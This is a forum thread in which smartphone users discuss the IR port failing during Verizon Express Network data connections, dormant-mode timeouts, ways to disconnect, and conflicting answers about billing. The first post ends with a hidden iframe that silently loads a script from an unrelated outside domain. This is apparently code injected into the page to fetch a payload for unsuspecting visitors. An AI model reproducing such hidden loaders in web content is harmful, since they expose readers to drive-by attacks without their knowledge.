+ Reply to Thread

IR and Data Connections

I have discovered that the IR ports does not work when there is any data connection active. As reported in another thread, I discovered this because Omni-Remote does not work while I have a dormant Express network connection active, but on further testing, I can not beam or receive any data over IR while either Express Network, or a QNC or other dial-up connection is active. Beaming does work while voice calls are active.

I haven't tried an IR sync during a data connection, but I assume it would fail as well.

Not a huge deal, but it does mean that the IR keyboard coolcat is testing is not likely going to work during a data connection.

Alan<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yeah, it's a limitation of the internal communications when in a data call. We discussed this a while back in regards to using IR to use the handset as a modem for a laptop.

Originally posted by alanb

<some text removed>
    As soon as I explicitly disconnect the data connection (or VZW times out, which is now two hours, not 5 minutes) Omni-Remote starts working again.

Alan
    Alan,
    it took me a while to find this thread (you can't search on IR, not enough characters)
    I just posted in another thread, concerning express network and dormant mode and IRDA.
    http://www.smartphonesource.com/vbul...&threadid=5036
    I think Verizon is having a problem with dormant mode too. I called the data group, their response was that dormant mode is supposed to drop after 5mins, and its one of the problems that they're trying to fix in the 7135.
    I found that even if you shut the dormant mode down... if those two up/down arrows icon are still on the phone screen , then the dormant mode is still there. The only way I've found to shut the connection really down is to power off/on the phone. This frees up the IRDA port.
    <bugle>

You can force closure of dormant mode by pressing end while in the Packet Data session (phone icon indicating you are in the data call). When in Dormant, you can "disconnect" through your online application or through the network preferences.

For example, if I am dormant in Snapper Mail, I can do a shortcut-D to disconnect, or go to the snappermail menu-->Options-->Disconnect.

Oh, and the search is limited to 3 or more characters in your expression, but you can add * to the front or back to fill expressions containing only 1-2 characters.

Originally posted by aka.bugle
    Alan,
    it took me a while to find this thread (you can't search on IR, not enough characters)
    I just posted in another thread, concerning express network and dormant mode and IRDA.
    http://www.smartphonesource.com/vbul...&threadid=5036
    I think Verizon is having a problem with dormant mode too. I called the data group, their response was that dormant mode is supposed to drop after 5mins, and its one of the problems that they're trying to fix in the 7135.
    I found that even if you shut the dormant mode down... if those two up/down arrows icon are still on the phone screen , then the dormant mode is still there. The only way I've found to shut the connection really down is to power off/on the phone. This frees up the IRDA port.
    <bugle>
    Someone needs to tell VZW tech support that they changed their policy a couple of weeks ago so that dormant mode drops after two hours, not five minutes.

When I want to drop my data connection, I do something to make the connection live (like check email) then use the disconnect command from whatever program I am using for data at the time. I have also found I can go to the network page in PDA_Prefs and select disconnect, and it will drop a dormant connection too, although it takes a while. Still, faster then power cycling the phone.

When I have a little time, I will write a little applet that will ping a site to bring a connection on-line from dormant, then drop the connection.

Alan

No need to make it live. A disconnect command will force it live to disconnect.

Mine does time out in 5 minutes of inactivity.

Mine works the same exact way as HotSync's.

Now my only BIG question is: Has ANYONE goten a straight answer from VZW C.S. in terms of the billing of the EN plan ? I have the $30 plan that allows the EN usage to go against my minutes. So far I have gotten 3 different answers in regards to the billing of the DORMANT mode. One said that I will NOT get billed for any of the dormant periods but my data minutes are rounded up to the nearest minutes just like my cell minutes. The second one told me that I am billed for the FIRST minute of dormancy and after that I am not billed while in dormant mode (1 min. total dormant mode billing) and the Third told me that I am billed for the ENTIRE dormant period (5 min. total dormant mode billing). So which on eis it ?? And no one can tell me since they cannont see my bill till it is released !!

if anyone has any insight I would GREATLY appreciate it!!

Originally posted by HoTSynC
    No need to make it live. A disconnect command will force it live to disconnect.

Mine does time out in 5 minutes of inactivity.
    Maybe from some programs. I primarily have tried this from mobile mail, and it doesn't seem to respond (although I may just not be patient enough, I did notice that if I disconnect from the network page in PDA_PREFS it takes a little while to respond if it is dormant)

My timeout is actually pretty inconsistent. It has been as long as 21 hours, although that was only during CES (I am willing to bet Verizon changed the settings so they could show off at the trade show) and the day after they announced the increase to 2 hours I was on for most of the day. Now I am pretty consistantly on for two hours unless I force the disconnection. Seems the only time I lose it in less then 2 hours is if I lose digital signal altogether (my house has marginal coverage, and I occasionally lose signal). Even then it sometimes comes back in dormant mode.

Alan

I wonder if there is anything to do with the actual location of the user on the EN network ? I live in CA and I get 5 min.

Originally posted by babacksh
    I wonder if there is anything to do with the actual location of the user on the EN network ? I live in CA and I get 5 min.
    It certainly is the kind of thing that could be market based, or something that is being rolled out one market at a time. I am in hte DC metro area.

Alan

Folks,

I used EN while travelling a while back, and the performance seemed to vary greatly depending on the region. LA was horrible -- the packet loss and speed where marginally better than a 14.4 connection with a laptop. Boston (where I live) seems consistently the best with speeds always 70K - 130K each way. I still get disconnected after 5 minutes, which is completely annoying.

Regarding the dormant connections and IR, I think the Dragonball I/O port that is used for EN is also the one used for IR. Normally this is not a problem, except that there are bugs in EN where it leaves the port hung up even when it is not in use. Resetting the phone can fix this, or usually stopping and starting a data connection will as well.

Glenn

Glenn

Originally posted by babacksh
    Mine works the same exact way as HotSync's.

Now my only BIG question is: Has ANYONE goten a straight answer from VZW C.S. in terms of the billing of the EN plan ? I have the $30 plan that allows the EN usage to go against my minutes. So far I have gotten 3 different answers in regards to the billing of the DORMANT mode. One said that I will NOT get billed for any of the dormant periods but my data minutes are rounded up to the nearest minutes just like my cell minutes. The second one told me that I am billed for the FIRST minute of dormancy and after that I am not billed while in dormant mode (1 min. total dormant mode billing) and the Third told me that I am billed for the ENTIRE dormant period (5 min. total dormant mode billing). So which on eis it ?? And no one can tell me since they cannont see my bill till it is released !!

if anyone has any insight I would GREATLY appreciate it!!
    Anyone have an answer to this question?